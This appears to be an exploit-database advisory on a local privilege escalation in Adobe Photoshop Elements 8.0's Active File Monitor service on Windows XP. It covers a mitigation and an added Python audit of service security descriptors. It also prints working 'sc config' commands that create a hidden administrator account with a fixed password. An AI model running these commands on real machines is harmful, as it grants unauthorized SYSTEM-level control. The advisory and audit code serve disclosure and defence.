Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation

Date: 29 Sep 2009 | Reported by: Pyrokinesis | Type: zdt | Source: 0day.today

Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation allows local elevation of privileges on Microsoft Windows XP SP3 due to an improper security descriptor on the "Adobe Active File Monitor V8" service.

# Title: Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pyrokinesis
# Published: 2009-09-29
# Verified: yes

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
 
Tested on Microsoft Windows XP SP3
 
The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious member of the Users group (which on XP means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of their choice, then restart
the service to run the command with SYSTEM privileges. For example, run these commands as a limited user:
 
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
 
Now log in as an administrator (the "adobe" account created above) with password "kills".
 
Mitigation:
 
The security descriptor of the service looks like this:
 
C:\>sc sdshow "AdobeActiveFileMonitor8.0"
 
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
 
Note the WO (WRITE_OWNER) and WD (WRITE_DAC) permissions granted to Everyone in the last ACE, whose trustee is the SID alias WD (!!!!!)
 
Change the security descriptor as follows:
 
C:\>sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS
 
Further reading, an interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx
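
An added example, not part of the original advisory: a Python check that parses "sc sdshow" output and reports allow ACEs that give low-privileged SIDs the rights to reconfigure, re-ACL or take ownership of a service. The function names and the LOW_PRIV alias list are assumptions made for this example; the two descriptors are the ones quoted in the advisory.

```python
import re

# Rights that let the holder take control of a service, as SDDL codes and mask bits:
# DC=SERVICE_CHANGE_CONFIG, WD=WRITE_DAC, WO=WRITE_OWNER, GW=GENERIC_WRITE, GA=GENERIC_ALL
DANGEROUS = {"DC": 0x0002, "WD": 0x40000, "WO": 0x80000,
             "GW": 0x40000000, "GA": 0x10000000}

# SID aliases treated as low-privileged (assumption: adjust for your environment)
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Users",
            "IU": "Interactive", "AN": "Anonymous", "BG": "Guests"}


def dangerous_rights(rights):
    """Return the dangerous rights named in an ACE rights field."""
    if rights.lower().startswith("0x"):          # numeric access mask form
        mask = int(rights, 16)
        return sorted(c for c, bit in DANGEROUS.items() if mask & bit)
    # Two-letter codes: split on pair boundaries so "SW"+"DT" is not read as "WD"
    pairs = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return sorted(pairs & set(DANGEROUS))


def audit_service_sddl(sddl):
    """List (trustee, rights) for allow ACEs that give low-privileged SIDs control."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    findings = []
    if not dacl:
        return findings
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1)):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "A":  # skip malformed and non-allow ACEs
            continue
        rights, sid = fields[2], fields[5]
        bad = dangerous_rights(rights)
        if sid in LOW_PRIV and bad:
            findings.append((LOW_PRIV[sid], bad))
    return findings


# Descriptors quoted in the advisory: as installed, and after the suggested sdset
INSTALLED = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
FIXED = "D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"

if __name__ == "__main__":
    for label, sd in (("installed", INSTALLED), ("fixed", FIXED)):
        print(label, audit_service_sddl(sd) or "no low-privileged control rights")
```

DC (SERVICE_CHANGE_CONFIG) in the Everyone ACE is the right that "sc config" needs; WD and WO would let the same user rewrite the DACL or take ownership even if DC alone were removed.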



#  0day.today [2018-04-13]  #
